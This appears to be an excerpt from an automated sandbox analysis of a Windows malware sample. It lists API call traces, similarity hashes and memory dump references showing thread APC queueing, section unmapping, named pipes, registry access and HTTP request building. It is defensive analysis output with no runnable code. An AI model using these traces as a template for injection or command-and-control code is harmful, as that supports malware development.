  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
